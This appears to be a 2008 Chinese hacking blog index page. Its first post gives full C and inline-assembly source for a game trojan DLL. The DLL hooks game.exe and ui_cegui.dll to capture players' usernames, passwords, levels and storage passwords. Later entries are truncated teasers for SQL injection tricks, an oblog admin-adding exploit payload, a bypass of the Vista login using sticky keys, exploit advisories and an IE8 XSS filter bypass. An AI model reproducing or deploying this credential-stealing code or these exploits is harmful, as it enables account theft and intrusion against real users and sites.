popphen.net.ru
预览模式: 普通 | 列表

天龙八部木马核心代码

作者:天晴无名氏 日期:2008-09-27 23:23

截取了用户名,密码,等级,仓库密码
CODE:
#include <windows.h> BYTE userCode[7]={0x8B,0x45,0x0C,0x50,0x8D,0x4B,0x5C}; BYTE userJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90}; BYTE gradeCode[6]={0x89,0x9F,0xFC,0x00,0x00,0x00}; BYTE gradeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90}; BYTE storeCode[9]={0x8B,0x4E,0x04,0x33,0xC5,0x57,0x8B,0x7D,0x08}; BYTE oldStoreCode[6]={0}; BYTE storeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90}; DWORD ui_cegui; void *lpUserRet=NULL; void  *lpGradeRet=NULL; void  *lpStoreRet=NULL; char user[40]; char pass[40]; char storePassWord[40]; DWORD dwGrade; DWORD stroePath=0; void _stdcall StroeUnhook(); void _stdcall HookStroe(); DWORD CmpFlag(BYTE *flag,char *moduleName,int len,void **lpRet , DWORD *lpModule) { BYTE *buff=NULL; HMODULE hModule=::GetModuleHandle(moduleName); if(hModule==NULL) { ::MessageBox(NULL,\"获取模块错误\",\"failed\",0); return 0; } DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)hModule+0x3c)+(DWORD)hModule+0x50); void *newModule=VirtualAlloc( NULL, imageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); *lpModule=(DWORD)newModule; memcpy(newModule,(void*)hModule,imageSize); for(DWORD i=0;i<imageSize;i++) { buff=(BYTE*)((DWORD)newModule+i); if(memcmp(buff,flag,len)==0) { *lpRet=(void*)buff; return i+(DWORD)hModule; } } return 0; } DWORD GetRealFlag(BYTE *flag,char *moduleName,int len,void <!--more-->**lpRet,DWORD newModule) { BYTE *buff=NULL; HMODULE hModule=::GetModuleHandle(moduleName); if(hModule==NULL) { ::MessageBox(NULL,\"获取模块错误\",\"failed\",0); return 0; } DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)hModule+0x3c)+(DWORD)hModule+0x50); for(DWORD i=0;i<imageSize;i++) { buff=(BYTE*)(newModule+i); if(memcmp(buff,flag,len)==0) { *lpRet=(void*)buff; return i+(DWORD)hModule; } } return 0; } void _stdcall GetUserBuff(char *userName,char *passWord) { strcpy(user,userName); strcpy(pass,passWord); return; } __declspec(naked)void GetUserAndPass() { _asm { push eax; mov eax,dword ptr ss:[ebp+0xC]; push eax; push ecx; call GetUserBuff; call StroeUnhook; pop eax; jmp [lpUserRet]; } } void _stdcall GetGradeDword(DWORD grade) { dwGrade=grade; return; } __declspec(naked)void GetGrade() { _asm { pushad; push ebx; call GetGradeDword; call HookStroe; popad; jmp [lpGradeRet]; } } void _stdcall StroeUnhook() { if(stroePath==0) return; MEMORY_BASIC_INFORMATION mbi; VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi); memcpy((void*)stroePath,oldStoreCode,6); VirtualProtect((void*)stroePath,7,mbi.Protect,0); return; } void _stdcall GetStoreBuff(char *storePass) { strcpy(storePassWord,storePass); char data[256]; wsprintf(data,\"用户名:%s\n密码:%s\n等级:%d\n仓库密码:%s\n\",user,pass,dwGrade,storePassWord); ::MessageBox(NULL,data,\"ok\",0); } __declspec(naked)void GetStore() { _asm { pushad; push ecx; call GetStoreBuff; call StroeUnhook; popad; jmp [lpStoreRet]; } } void _stdcall HookStroe() { stroePath=GetRealFlag(storeCode,\"ui_cegui.dll\",9,&lpStoreRet,ui_cegui); if(stroePath==0) return ; stroePath=stroePath+0x43; lpStoreRet=(void*)((DWORD)lpStoreRet+0x43); DWORD jmpAddress=(DWORD)GetStore-(stroePath+5); *(DWORD*)(&storeJmpCode[1])=jmpAddress; memcpy(oldStoreCode,(BYTE*)stroePath,6); MEMORY_BASIC_INFORMATION mbi; VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi); memcpy((void*)stroePath,storeJmpCode,6); VirtualProtect((void*)stroePath,7,mbi.Protect,0); return; } void HookGrade() { DWORD passPath=CmpFlag(gradeCode,\"ui_cegui.dll\",6,&lpGradeRet,&ui_cegui); if(passPath==0) return ; DWORD jmpAddress=(DWORD)GetGrade-(passPath+5); *(DWORD*)(&gradeJmpCode[1])=jmpAddress; MEMORY_BASIC_INFORMATION mbi; VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)&mbi); memcpy((void*)passPath,gradeJmpCode,6); VirtualProtect((void*)passPath,7,mbi.Protect,0); } void HookUserAndPass() { DWORD hModule; DWORD passPath=CmpFlag(userCode,\"game.exe\",7,&lpUserRet,&hModule); if(passPath==0) return ; DWORD jmpAddress=(DWORD)GetUserAndPass-(passPath+5); *(DWORD*)(&userJmpCode[1])=jmpAddress; MEMORY_BASIC_INFORMATION mbi; VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)&mbi); memcpy((void*)passPath,userJmpCode,6); VirtualProtect((void*)passPath,7,mbi.Protect,0); } DWORD WINAPI Thread(LPVOID lpParam) { HookUserAndPass(); HookGrade(); return 0; } BOOL APIENTRY DllMain( HANDLE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved ) { switch(ul_reason_for_call) { case DLL_PROCESS_ATTACH: { DWORD ThreadId; CreateThread(NULL,NULL,Thread,NULL,NULL,&ThreadId); break; } default:break; } return TRUE; }

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 120

巧用路由器限制局域网主机的带宽流量

作者:天晴无名氏 日期:2008-09-27 23:18

但是常常有这样的情况:由于个别人过量占用带宽导致其它人正常上网的速度都很慢,正常的业务都无法开展,所以对局域网主机带宽流量的管理就被提上日程了。预算不是很多的客户,可能需要借助现有的硬件设备了,下面我们就从路由器入手来限制局域网主机的带宽。

  这种共享上网的方法一般如下:电话线--语音分离器--ADSL猫--宽带路由器--交换机 集线器--电脑

  在这种情况下,我经过思考与试验,我发现可以通过对

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 123

全新的注入点检测方法

作者:天晴无名氏 日期:2008-09-26 12:35

 现在有很多防注入程序屏蔽了 and、1=1、1=2 类似这样的关键字,使用这样的方法有时不能探测到注入点了。

  那么是否有新的方法能够探测注入点呢? 经过一段时间的研究,发现了更好的方法。哈哈,特此共享一下。

  现在假设有一个新闻页面,URL 是 http://gzkb.goomoo.cn/news.asp?id=123,

  1. 在浏览器中打开,可以看到一个正常的新闻页面;

  2. 在URL

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 123

轻松破解Vista登录密码!

作者:天晴无名氏 日期:2008-09-14 15:28

安装“XP+Vista”双系统的用户越来越多,不过总有些马大哈们会忘记Vista帐户密码。由于Vista采用比XP更为严格的登录认证,如果遗忘登录密码,我们是很难进入系统的。不过,微软在登录界面有一个粘滞键漏洞,可以用它来进入Vista。
 
  粘滞键漏洞是指我们在登录界面按五下Shif启动粘滞键(系统目录下的sethc.exe),因此我们可以在XP下用cmd.

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 115

oblog4.6添加后台管理员漏洞(仅适用于sql版)

作者:天晴无名氏 日期:2008-09-12 13:20

、注册一个用户,用户名script,密码123456

  2、发布一篇日志,日志标题:测试一下

  3、个人前台首页找到日志"测试一下",点"推荐"

  4、个人后台管理,选择"常用"选项中的"推荐日志",然后点"测试一下"日志后面的修改,把摘要内容修改成:

s'/**/WHERE/** /log

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 106

拿下DVBBS php官网

作者:天晴无名氏 日期:2008-09-08 21:52

文章作者:oldjun[S.U.S]
信息来源:oldjun's blog(www.oldjun.com/blog)

注意:文章已经发表在2008第7期《黑客防线》上,转载请注明出处。(最近拿站比较多,没来得及写日志,拿这篇文章凑数!)

几个月前,DVBBS php2.0暴了一个可以直接读出管理员密码的sql注入漏洞,当时这个漏洞出来的时候,我看的心痒,怎么还会有这么弱智的漏洞,DVBBS p

[阅读全文]

标签: DVBBS
类别: Articles | 引用: 0 | 评论: 0 | 阅读: 121

远程SQL注入漏洞

作者:天晴无名氏 日期:2008-09-08 21:48

Altrasoft Forum (cat) Remote SQL Injection Vulnerability
################################################################
#       .___      &

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 97

Masir Camp E-Shop Module <= 3.0 (ordercode) SQL Injection Vuln

作者:天晴无名氏 日期:2008-09-08 21:47

########################## www.BugReport.ir #######################################
#
#        AmnPardaz Security Research Team
#
# Title: Masir Camp E-Shop Module &

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 89

myPHPNuke < 1.8.8_8rc2 (XSS/SQL) Multiple Remote Vulnerabilities

作者:天晴无名氏 日期:2008-09-08 21:46

############################################################

Cross-Site Scripting and SQL Injection vulnerabilities in myPHPNuke

By MustLive (http://websecurity.com.ua)

Detailed information: http://we

[阅读全文]

标签: myPHPNuke
类别: Articles | 引用: 0 | 评论: 0 | 阅读: 77

IE8 XSS Filter Bypass

作者:天晴无名氏 日期:2008-09-05 23:20

漏洞说明:IE8是微软新推出的一款浏览器,其对CSS2.1的完整支持,HTML5的支持,内置开发工具等等。IE8在浏览器安全性上有非常大的改进,内置了一款无法卸载的Xss Filter,对非持久型跨站脚本攻击做了比较好的防护。但是80sec在测试IE8时发现,IE8的Xss Filter存在漏洞,导致在一些东方国家的版本里根本不能阻止URL Xss,譬如在中文版本里,利用一些简单的数据就可以Byp

[阅读全文]

标签: IE8 XSS
类别: Articles | 引用: 0 | 评论: 0 | 阅读: 92